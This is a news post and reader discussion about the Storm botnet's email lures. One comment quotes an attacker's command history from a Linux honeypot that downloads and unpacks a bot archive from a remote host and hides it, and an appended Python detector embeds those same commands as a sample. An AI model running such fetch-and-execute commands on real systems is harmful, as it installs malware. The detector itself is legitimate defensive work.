Storm Botnet Is Behind Two New Attacks
We've gotten a number of submissions about the new tricks the massive Storm botnet has been up to. Estimates of the size of this botnet range from 250K-1M to 5M-10M compromised machines. Reader cottagetrees notes a writeup at Exploit Prevention Labs on a new social engineering attack involving YouTube. The emails, which may be targeted at people who use private domain registrations, warn the recipient that their "face is all over 'net" on a YouTube video. The link is to a Storm-infected bot that attacks using the Q4Rollup exploit (a package of about a dozen encrypted exploits). And reader thefickler writes that the recent wave of "confirmation spam" is also due to Storm, as was the earlier, months-long "e-card from a friend" series of attack emails.
I fscking hate SPAM!
Dominant Meme
Well, one point in favour of Linux security is the central software repository for each and every distro.
Linux users typically will not - even when the popularity of Linux rises - install random cursors, free smilies and whatnot - simply because they'll be used to installing things from the repository.
And it's quite simple to hammer that into people's heads: the software from the repository is safe. Other software is not.
There is still nothing similar in the Windows world.
Ignore this signature. By order.
For instance, here's a recent attack to my honeypot (Running Slackware Linux)
/home/webmaster/. ./ .bash_history .ssh/ ../ .screenrc .xsession /home/webmaster/.bash_history /etc/hosts /proc/cpuinfo /var/tmp .bot/
root@zomg:~# cat
root@zomg:~# cat
ssh localhost
w
cat
cat
passwd
cd
ks
l
sl
ls
ls- all
ls -all
mkdir " "
cd " "
clear
wget imaginez0r.xhost.ro/botme.tar.gz
tar zxvf botme.tar.gz
rm -rf botme.tar.gz
cd
PATH=.:$PATH
bash
These kinds of attacks happen every day, sometimes more than once a day. If you don't patch and secure your machine, or do stupid things like download and run binaries, it's gonna get owned. Doesn't matter what OS you run.
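A small detector for the post-compromise pattern visible in that history, added here as an example and not part of the original comment: it flags a whitespace-only directory name, a remote archive fetch, removal of the dropper after unpacking, and the current directory being put first on PATH. The rules and the embedded sample history are constructed from the commands shown above.

```python
# Added example: flag the indicators seen in the honeypot .bash_history above.
import re
import shlex
from typing import List, Tuple

# Constructed sample, taken from the commands the commenter posted.
SAMPLE_HISTORY = """\
w
passwd
ls -all
mkdir " "
cd " "
clear
wget imaginez0r.xhost.ro/botme.tar.gz
tar zxvf botme.tar.gz
rm -rf botme.tar.gz
PATH=.:$PATH
bash
"""

ARCHIVE_RE = re.compile(r"\.(tar\.gz|tgz|tar|zip|gz)$", re.I)


def classify(cmd: str) -> List[str]:
    """Return the indicator names a single history line matches."""
    hits: List[str] = []
    try:
        argv = shlex.split(cmd)
    except ValueError:
        return ["unparseable_quoting"]
    if not argv:
        return hits
    # A directory named only with whitespace hides from a casual `ls`.
    if argv[0] in ("mkdir", "cd") and len(argv) > 1 and argv[1].strip() == "":
        hits.append("whitespace_dirname")
    # Fetching an archive from a remote host into the current directory.
    if argv[0] in ("wget", "curl") and any(ARCHIVE_RE.search(a) for a in argv[1:]):
        hits.append("remote_archive_fetch")
    # Deleting the archive after unpacking it removes the dropper from disk.
    if argv[0] == "rm" and any(ARCHIVE_RE.search(a) for a in argv[1:]):
        hits.append("dropper_cleanup")
    # "." first on PATH lets binaries in the cwd shadow system commands.
    if re.match(r"^PATH=\.(:|$)", cmd):
        hits.append("cwd_first_on_path")
    return hits


def scan_history(text: str) -> List[Tuple[int, str, List[str]]]:
    """Return (line_no, command, indicators) for every line that matched."""
    findings = []
    for n, line in enumerate(text.splitlines(), 1):
        hits = classify(line.strip())
        if hits:
            findings.append((n, line, hits))
    return findings


if __name__ == "__main__":
    for n, cmd, hits in scan_history(SAMPLE_HISTORY):
        print(f"line {n}: {cmd!r} -> {', '.join(hits)}")
```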